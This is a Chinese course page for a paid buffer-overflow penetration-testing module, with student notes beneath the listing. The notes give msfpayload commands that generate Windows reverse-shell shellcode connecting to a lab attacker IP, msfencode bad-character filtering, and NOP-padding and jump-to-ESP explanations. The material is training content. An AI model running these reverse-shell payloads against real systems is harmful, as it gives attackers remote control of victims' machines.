默认计划
931人加入学习
(9人评价)
安全测试缓冲区溢出

购买过Kali Linux渗透测试、武官课程包、安全技术会员课程的学员不要再买此课程

价格 ¥ 300.00
该课程属于 高校公益行 | 网络安全实践训练营 请加入后再学习

find / -name msfpayload

cd /usr/share/framework2/

./msfpayload                   //用于生成payload

win32_reverse LHOST=192.168.1.117 LPORT=444 C  //生成用C语言写的反向连接444端口

win32_reverse LHOST=192.168.1.117  | grep 0d

 

win32_reverse LHOST=192.168.1.117  R | ./msfencode -b "\x00\x0a\x0d"     //-b表示不要

 

"\x90" 表示不操作    

[展开全文]

发送测试数据08.py

断点停止后,按F7

使用msfpayload生成shellcode

cd /usr/share/framework2

./msfpayload -l

注意:现在服务器防火墙通常只允许外部访问特定端口,就算运行脚本开启服务器的其他端口外部也不能访问,故shellcode一般让服务器来主动连接攻击者端口

生成shellcode

./msfpayload win32_reverse LHOST=192.168.20.8 LPORT=443 C

在shellcode发现坏字符,通过编码绕过

./msfpayload win32_reverse LHOST=192.168.20.8 LPORT=443 R | ./msfencode -b “\x00\x0a\x0d”

将shellcode编入程序

为了避免shellcode前几个字符被擦掉,在shellcode前面插入几个空字符

[展开全文]

在内存中存放数据完全相反的

f7键是调试过程中单步向前执行

下一步就向esp里面写入shellcode的代码啦

写shellcode 自己运用scratch写编码

第二就是现成的 kali里面有msfpayload 就是生产各种各样的shellcode

payload 又称载荷 要发到目标系统中 有目标系统进行执行 然后取得控制权之类的代码

shell是payload的子集 

生产shellcode 然后注入到esp寄存器里面 按他让我们跳转的方式执行从而控制目标服务器

或者是自己有一个后门程序 将他16进制提取出来 发到对方esp服务器里面 当然shellcode内容也比较要小

寻找的命令格式

win32 就是在windows上执行的

win32反向链接

让受害者主动向我进行连接

连我的结果就是将我的shell操作系统的权限发给你

msfencode 可以对shellcode进行编码 吧坏字符过滤 -b表示过滤

\x对应的汇编语言是nop 是不操作的意思

因为 保证shellcode运行的有效性 直接跳转到esp 前面的第一位或者几位字符可能被cpu进行擦除掉或者是覆盖 和cpu的特性有关 

[展开全文]